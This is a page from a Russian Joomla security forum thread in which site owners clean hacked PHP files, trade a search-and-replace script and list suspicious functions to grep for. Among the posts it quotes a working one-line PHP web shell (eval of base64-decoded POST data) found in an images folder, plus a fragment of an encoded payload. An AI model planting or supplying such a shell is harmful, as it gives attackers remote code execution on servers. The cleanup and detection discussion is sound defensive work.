[Решено] В php файлах во всех появилась хрень какая-то появилось давно что это ? - страница 2 - Безопасность сайтов на Joomla

Но вы там не все указали )))

Код может быть обфусцирован, но разные eval, base64_decode, gzuncompress, gzinflate, ob_start, str_rot13 с абракадаброй тоже весьма привлекают внимание, как и вариации на тему file, fopen, readfile, file_get_contents, HttpRequest::send с чужими адресами.

источник

Скажите пожалуйста, а поиск по регулярным выражениям в Вашем скрипте есть? Если есть, то какие переменные для задания регулярных выражений?

Пока нет, но я думал про это, так как нужно искать еще строки больше определенной длины (обфусцированный код или закодированный через base64_encode обычно имеет большую длину и без пробелов), вообще скрипт пригодится и для обычной работы с сайтом, часто возникает потребность найти в коде что-то, а без скачивания сайта или отдельных папок себе на компьютер не обойтись, есть наверное фтп клиенты с поиском по содержимому файов, но они будут работать намного медленнее чем скрипт, так как скрипт использует ресурсы сервера, а  фтп клиент домашнего компьютера на котором установлен. Если кому нужно можно переделать в компонент для Joomla.

icom, спасибо за скрипт! Если Вы не против оставлю заметку у себя на сайте

Пожалуйста, я не против

Но вы там не все указали )))источник

вы правы, нужно расширить список подозрительных функций

Файл например может найти "eval(base64_decode("
а вот более eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlc уже не ищет, и еще добавляет слеш
а если нечего заменить просто удалить,  пробел ставить нельзя?

Файл например может найти "eval(base64_decode("
а вот более eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlc уже не ищет, и еще добавляет слеш

исправил

а если нечего заменить просто удалить,  пробел ставить нельзя?

можно, а можно и ничего не ставить, просто галку "Заменить" поставить

Респект и +10 icom
Вот нашел такой линк 

$link  = base64_decode( JRequest::getVar( 'link', '', 'post', 'base64' ) );

Это может быть вредоносным кодом ?

не думаю, base64_decode сама по себе не опасна, а вот с функцией eval() да

Добрый вечер, спасибо за скрипт. Вопрос такой:
с помощью вашего скрипта подчистил код, поменял пароли на фтп. Искал только по строке, которая везде добавлялась:

какие действия еще нужно провести? в теме идет речь о поиске шела и прочее, мне это не очень понятно. Иными словами, что еще нужно поискать/как поискать/логи какие то почитать? чтобы не было повторного заражения ?

2MaxFarSeer
читаем
http://joomlaforum.ru/index.php/topic,198048.msg1042877.html#msg1042877

Использую утилиту: replace.zip
В поле: Текст поиска*: пишу полностью вредоносный код с ковычками.
Вопрос: Что указывать в поле -  "Текст замены:"

Использую утилиту: replace.zip
В поле: Текст поиска*: пишу полностью вредоносный код с ковычками.
Вопрос: Что указывать в поле -  "Текст замены:"

А ссылочку?

Имеется ввиду, использую утилиту  http://cmsdev.org/files/replace.zip о ней сообщалось в этой ветке. Предназначена для массового удаления вредоносного кода base64_decode. Не совсем понял, что писать в поле  "Текст замены:"

вредоносного кода base64_decode. Не совсем понял, что писать в поле  "Текст замены:"

 base64 как и md5 просто метод кодировки decode указывает что надо раскодировать (курим мануалы)
а сам вредоносный код идет дальше DQplcnJvcl9yZXB...........

Вот чистая Joomla 1.5.25 с оф сайта

Ребята, спасибо огромное.
Replace - вещь!
Fls из темы http://joomlaforum.ru/index.php/topic,198048.msg1042877.html#msg1042877 класс!
Нужно их оба использовать, с помощью первой вычистил сайт от eval base с помощью второй нашел уязвимость в компоненте "Simple Spotlight" http://extensions.joomla.org/extensions/photos-a-images/images-rotators/11876 причем такая дыра - рай для хакера, шелл залить на раз - оставили форму загрузки картинок, причем скачал с оф.сайта дистрибутив, видимо не увидели просто.

проверьте папку images, там может быть файл post.php со следующим содержанием

<?php eval(base64_decode($_POST["php"])); ?>

Стирайте нахрен, из него и растут роги. У меня он был только в одном сайте, но были поражены все, которые лежали рядом

А мои сайты заразили, создав отдельные папки. На одном в корне была создана папка lib, в неё залит index.php с кодом:


В этой же папке лежал .htaccess с записью:

В результате работы в индексе поисковиков появились страницы с ключевыми запросами на варезники. И "наштамповано" было более 1000.

Есть ли вероятность того, что простое удаление этой папки, не решает проблему?
index.php в корне проверила, ничего подозрительного не увидела

2angemax
скрипт в подписи проверьте сайт

Ребята. Я так и не понял...  Что штавить в "Текст замены"

Ребята. Я так и не понял...  Что штавить в "Текст замены"

если стоит галка "Замена", то в файлах сайта "Текст поиска" будет заменен на "Текст замены", если в "Текст замены" ничего нет, то "Текст поиска" будет удален из файлов )

Ага сделал))  И сайд пос этого не работает ....

а что вы конкретно сделали? верните из бекапа
лучше скриптом не пользуйтесь, если не знаете для чего он

Ну вставлял: eval, base64_decode, gzuncompress, gzinflate, ob_start, str_rot13.........

Нашёл много..

Потом поставил галкаку  "Замена"

в "Текст замены" ничаво не писал.

И все

Потом саид не работал  ERROR line 188

eval, base64_decode, gzuncompress, gzinflate, ob_start, str_rot13 это все функции php, которые используются как в самой Joomla так и в сторонних компонентах, если вы их нашли, то это не повод их удалять), лучше обратитесь к специалистам в этом вопросе, а сайт восстановите из бекапа, если его нет, то обратитесь к хостеру чтоб восстановил

хочу выяснить как происходит заражение (слежу 3 дня), у него 24 сайта на одном аккаунте, заражаются регулярно только три, через что мне казалось что взламывают не через фтп

Появилась идея, как взламывали? А то приехала точно такая же радость. Файлы меняли в два захода, логов за эти дни уже нет.

чуть выше есть ответ: в папке images файл post.php спасибо автору за подсказку

чуть выше есть ответ: в папке images файл post.php

Это не ответ. Ответ звучит так: файл post.php попал на сервер в результате ...
Вот многоточие как раз и интересует. Сервер я вычистил, с июля тихо. Но как это Г. мне закинули - остаётся большим вопросом.

Логи доступа читайте...

Было бы что читать - давно бы вычитал. Я уже объяснил:

Файлы меняли в два захода, логов за эти дни уже нет.

Шелл закинули и он около двух месяцев (если судить по дате создания файла) тихо лежал. Когда им начали пользоваться, логов на дату создания файла уже не было.

обновил скрипт http://joomlaforum.ru/index.php/topic,197284.msg1043065.html#msg1043065

http://secu.ru/scripts/find-and-replace

Кто за определенную плату может полечтить сайт от вируса-редиректа?